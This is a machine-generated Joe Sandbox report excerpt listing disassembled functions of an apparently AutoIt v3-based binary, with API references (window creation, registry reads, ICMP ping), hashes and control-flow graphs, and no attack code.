                                                                                                                                                  • Instruction ID: 3f85556015c487484f05e7f086051549a8813db2372bb66c577bdc2ea600c81c
                                                                                                                                                  • Opcode Fuzzy Hash: 948842added9be707e0a403be1b9d302d2760d77c2d46ba7897858ac149ccd55
                                                                                                                                                  • Instruction Fuzzy Hash: D331D171108341EFC304EF55E885BAFBBE8EF95300F10092EF595D62A1EB719A89CB52
                                                                                                                                                  Function 00BCB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD3740: CharUpperBuffW.USER32(?,00C871DC,00000000,?,00000000,00C871DC,?,00BC53A5,?,?,?,?), ref: 00BD375D
                                                                                                                                                  • _memmove.LIBCMT ref: 00BCB68A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2819905725-0
                                                                                                                                                  • Opcode ID: aa398f4d42fe923f0d85d86439e3a8c7267db84e717e81edf309fa8938ac3f6e
                                                                                                                                                  • Instruction ID: d949accda2e4efa783d33fb494e6be1bd6fd49b91cd9f98f52b0357931cc3f89
                                                                                                                                                  • Opcode Fuzzy Hash: aa398f4d42fe923f0d85d86439e3a8c7267db84e717e81edf309fa8938ac3f6e
                                                                                                                                                  • Instruction Fuzzy Hash: 1CA246706087819FD724DF18C481F2AB7E5FF88304F1489ADE89A9B2A1D771ED45CB92
                                                                                                                                                  Function 00BC94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3a63ed0a0f3eb64232e39de8508551cb2ff32be06058dbef7b3b4bacb4513c4e
                                                                                                                                                  • Instruction ID: d421fed13c279be36718913aef0c7a3c137f0a888ce117c782beb6e97133700d
                                                                                                                                                  • Opcode Fuzzy Hash: 3a63ed0a0f3eb64232e39de8508551cb2ff32be06058dbef7b3b4bacb4513c4e
                                                                                                                                                  • Instruction Fuzzy Hash: 46226974A00216CFEB24DF54C488BAEB7F0FF59310F1481AEE856AB391D774A981CB91
                                                                                                                                                  Function 00BCBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • timeGetTime.WINMM ref: 00BCBF57
                                                                                                                                                    • Part of subcall function 00BC52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,00BCBCD4,?,?), ref: 00BC52E6
                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C036B5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                                  • API String ID: 1792118007-922114024
                                                                                                                                                  • Opcode ID: b50cdb4e3bf2cdc18a8aa86c45d76a9a1a7ea57caf1874aec1000a7f4ee8bb7f
                                                                                                                                                  • Instruction ID: 22f7277d9980c8feed203dde8b3e5ea6518d586fca714f0bb343506979dd7c0e
                                                                                                                                                  • Opcode Fuzzy Hash: b50cdb4e3bf2cdc18a8aa86c45d76a9a1a7ea57caf1874aec1000a7f4ee8bb7f
                                                                                                                                                  • Instruction Fuzzy Hash: 0AC2AE706083819FD728DF24C895FAEBBE4FF84304F14895DE59A972A1DB71E984CB42
                                                                                                                                                  Function 00BC33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3444
                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00BC346E
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC347F
                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC349C
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC34AC
                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00BC34C2
                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC34D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                  • Opcode ID: 3464c7b3267cb02250bc5f8c7b8709932b42373bcd3ad59d7c2e9a1f4dc1dba9
                                                                                                                                                  • Instruction ID: c49b5f1393cc0aecabd6356a27d322b9db26fbde73699650157edd605ca7f425
                                                                                                                                                  • Opcode Fuzzy Hash: 3464c7b3267cb02250bc5f8c7b8709932b42373bcd3ad59d7c2e9a1f4dc1dba9
                                                                                                                                                  • Instruction Fuzzy Hash: 863147B5804309EFDB408FA4EC88BDDBBF0FB09311F20425AE990E62A0E7B55581CF94
                                                                                                                                                  Function 00BC3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3444
                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00BC346E
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC347F
                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC349C
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC34AC
                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00BC34C2
                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC34D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                  • Opcode ID: c640b6bbd3d8b02da1a3b7e71714cb369ff75601cd66decc43b2f1d68cc44e73
                                                                                                                                                  • Instruction ID: 6524ff4c643a6542c29a6a7e885d5092e408a267b0f3952648a5c88bc4a7c0b2
                                                                                                                                                  • Opcode Fuzzy Hash: c640b6bbd3d8b02da1a3b7e71714cb369ff75601cd66decc43b2f1d68cc44e73
                                                                                                                                                  • Instruction Fuzzy Hash: 9621C5B5904319AFDB009FA4EC89B9DBBF4FB08711F20421AF914F62A0E7B15584CF95
                                                                                                                                                  Function 00BD2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BD3094), ref: 00BE00ED
                                                                                                                                                    • Part of subcall function 00BE08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BD309F), ref: 00BE08E3
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BD30E2
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C101BA
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C101FB
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00C10239
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C10292
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                  • API String ID: 2673923337-2727554177
                                                                                                                                                  • Opcode ID: 139c9a37a01c5d4df56b13ef1f0a76dce5fb24bef1beeb0bda8b2b00a82e58df
                                                                                                                                                  • Instruction ID: 7a6edd01d2edcf3566cc842e0d3aa30a3052fd415d0786c9928ebad58ebee4c8
                                                                                                                                                  • Opcode Fuzzy Hash: 139c9a37a01c5d4df56b13ef1f0a76dce5fb24bef1beeb0bda8b2b00a82e58df
                                                                                                                                                  • Instruction Fuzzy Hash: CD718E71405701AEC314EF29DC81AAFBBE8FF45350B90492EF445C72A1EF709988CB5A
                                                                                                                                                  Function 00BD514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BD5156
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00BD5165
                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00BD517C
                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00BD518E
                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00BD51A0
                                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BD51C6
                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00BD521C
                                                                                                                                                    • Part of subcall function 00BC3411: GetSysColorBrush.USER32(0000000F), ref: 00BC3444
                                                                                                                                                    • Part of subcall function 00BC3411: RegisterClassExW.USER32(00000030), ref: 00BC346E
                                                                                                                                                    • Part of subcall function 00BC3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC347F
                                                                                                                                                    • Part of subcall function 00BC3411: InitCommonControlsEx.COMCTL32(?), ref: 00BC349C
                                                                                                                                                    • Part of subcall function 00BC3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC34AC
                                                                                                                                                    • Part of subcall function 00BC3411: LoadIconW.USER32(000000A9), ref: 00BC34C2
                                                                                                                                                    • Part of subcall function 00BC3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC34D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                  • Opcode ID: 162c3c15479c8c22578d17562ce139c04eea2a5aa4a2a956a3ec4423126beff4
                                                                                                                                                  • Instruction ID: 019d467fff59ed710a1e12af0ff9241c38f4deaf601ce354103e5ec2d4aa4530
                                                                                                                                                  • Opcode Fuzzy Hash: 162c3c15479c8c22578d17562ce139c04eea2a5aa4a2a956a3ec4423126beff4
                                                                                                                                                  • Instruction Fuzzy Hash: 5D214875904308EFEB109FA4ED49B9D7BF4FB48751F20425AF504A62A0E7B69990CF88
                                                                                                                                                  Function 00C35E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 744 c35e1d-c35e54 call bc4dc0 747 c35e56-c35e63 call bc502b 744->747 748 c35e74-c35e86 #115 744->748 747->748 757 c35e65-c35e70 call bc502b 747->757 749 c35e88-c35e98 call c17135 748->749 750 c35e9d-c35edb call bd40cd call bc4d37 call bd402a #10 #52 748->750 759 c35ff6-c35ffe 749->759 765 c35edd-c35eea IcmpCreateFile 750->765 766 c35eec-c35efc call c17135 750->766 757->748 765->766 768 c35f01-c35f32 call be0fe6 call bd433f 765->768 771 c35fed-c35ff1 call bd1cb6 766->771 776 c35f55-c35f69 IcmpSendEcho 768->776 777 c35f34-c35f53 IcmpSendEcho 768->777 771->759 778 c35f6d-c35f6f 776->778 777->778 779 c35fa2-c35fa4 778->779 780 c35f71-c35f76 778->780 781 c35fa6-c35fb2 call c17135 779->781 782 c35fba-c35fcc call bc4dc0 780->782 783 c35f78-c35f7d 780->783 791 c35fd4-c35fe8 IcmpCloseHandle #116 call bd45ae 781->791 792 c35fd2 782->792 793 c35fce-c35fd0 782->793 786 c35fb4-c35fb8 783->786 787 c35f7f-c35f84 783->787 786->781 787->779 790 c35f86-c35f8b 787->790 794 c35f9a-c35fa0 790->794 795 c35f8d-c35f92 790->795 791->771 792->791 793->791 794->781 795->786 797 c35f94-c35f98 795->797 797->781
                                                                                                                                                  APIs
                                                                                                                                                  • #115.WSOCK32(00000101,?), ref: 00C35E7E
                                                                                                                                                  • #10.WSOCK32(?,?,?), ref: 00C35EC3
                                                                                                                                                  • #52.WSOCK32(?), ref: 00C35ECF
                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00C35EDD
                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00C35F4D
                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00C35F63
                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000,00000002,00000000), ref: 00C35FD8
                                                                                                                                                  • #116.WSOCK32 ref: 00C35FDE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
                                                                                                                                                  • String ID: Ping
                                                                                                                                                  • API String ID: 1853569507-2246546115
                                                                                                                                                  • Opcode ID: be7d8163e2a91a49221ac50c770d7086ec7b21ad319542839948f2ab36114e8b
                                                                                                                                                  • Instruction ID: 80a06e7c64667f19531ecea71e9e1d1db0ba21fa462f1ebcc762b44652576d26
                                                                                                                                                  • Opcode Fuzzy Hash: be7d8163e2a91a49221ac50c770d7086ec7b21ad319542839948f2ab36114e8b
                                                                                                                                                  • Instruction Fuzzy Hash: 0D516B316146019FD720AF65CC49B2EB7E4AF48720F144969F9AAEB2A1DB70E9409B42
                                                                                                                                                  Function 00BD4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 798 bd4d83-bd4dd1 800 bd4e31-bd4e33 798->800 801 bd4dd3-bd4dd6 798->801 800->801 804 bd4e35 800->804 802 bd4dd8-bd4ddf 801->802 803 bd4e37 801->803 805 bd4ead-bd4eb5 PostQuitMessage 802->805 806 bd4de5-bd4dea 802->806 808 bd4e3d-bd4e40 803->808 809 c109c2-c109f0 call bcc460 call bcc483 803->809 807 bd4e1a-bd4e22 DefWindowProcW 804->807 814 bd4e61-bd4e63 805->814 810 c10a35-c10a49 call c22cce 806->810 811 bd4df0-bd4df2 806->811 813 bd4e28-bd4e2e 807->813 815 bd4e65-bd4e8c SetTimer RegisterWindowMessageW 808->815 816 bd4e42-bd4e43 808->816 845 c109f5-c109fc 809->845 810->814 836 c10a4f 810->836 817 bd4df8-bd4dfd 811->817 818 bd4eb7-bd4ec1 call bd5b29 811->818 814->813 815->814 819 bd4e8e-bd4e99 CreatePopupMenu 815->819 822 c10965-c10968 816->822 823 bd4e49-bd4e5c KillTimer call bd5ac3 call bc34e4 816->823 825 c10a1a-c10a21 817->825 826 bd4e03-bd4e08 817->826 838 bd4ec6 818->838 819->814 830 c1096a-c1096c 822->830 831 c1099e-c109bd MoveWindow 822->831 823->814 825->807 833 c10a27-c10a30 call c18854 825->833 834 bd4e0e-bd4e14 826->834 835 bd4e9b-bd4eab call bd5bd7 826->835 839 c1098d-c10999 SetFocus 830->839 840 c1096e-c10971 830->840 831->814 833->807 834->807 834->845 835->814 836->807 838->814 839->814 840->834 841 c10977-c10988 call bcc460 840->841 841->814 845->807 849 c10a02-c10a15 call bd5ac3 call bd59d3 845->849 849->807
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00BD4E22
                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00BD4E4C
                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BD4E6F
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD4E7A
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00BD4E8E
                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00BD4EAF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                                                  • Opcode ID: 99a0fe4f9cb550592a62bbf2bfc117d72abd54c764c5f22bbc680ed07ca80f39
                                                                                                                                                  • Instruction ID: f58216536769d24e9f8de8f7fe40b89b45c0fefd8f517c84036dba374edce06b
                                                                                                                                                  • Opcode Fuzzy Hash: 99a0fe4f9cb550592a62bbf2bfc117d72abd54c764c5f22bbc680ed07ca80f39
                                                                                                                                                  • Instruction Fuzzy Hash: AC41C371208205BBDB296F24DC99BBEB7D5F745301F20066BF511E13A2FB70A890A765
                                                                                                                                                  Function 00BD56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104,00C87A2C,00C87890), ref: 00C10C5B
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  • _memset.LIBCMT ref: 00BD5787
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00BD57DB
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 00BD57EB
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C10CD1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                                                                                  • String ID: Line %d: $AutoIt -
                                                                                                                                                  • API String ID: 230667853-4094128768
                                                                                                                                                  • Opcode ID: da3b6673ca1ad3fe4dfc3b4816eaf191dc8a556569d531b247bd86a00651223c
                                                                                                                                                  • Instruction ID: 3d56feb39512b05647b9e5aa22d97d49add8ca5cbb32cbe30abefe738b88cd25
                                                                                                                                                  • Opcode Fuzzy Hash: da3b6673ca1ad3fe4dfc3b4816eaf191dc8a556569d531b247bd86a00651223c
                                                                                                                                                  • Instruction Fuzzy Hash: 0441B371008304AAC321EB64DC95BDFB7DCAF44350F240A6BF095922A1FF749689CB97
                                                                                                                                                  Function 00BD50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 941 bd50db-bd514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00C88290,00BD5328), ref: 00BD5109
                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BD512A
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00BD513E
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00BD5147
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
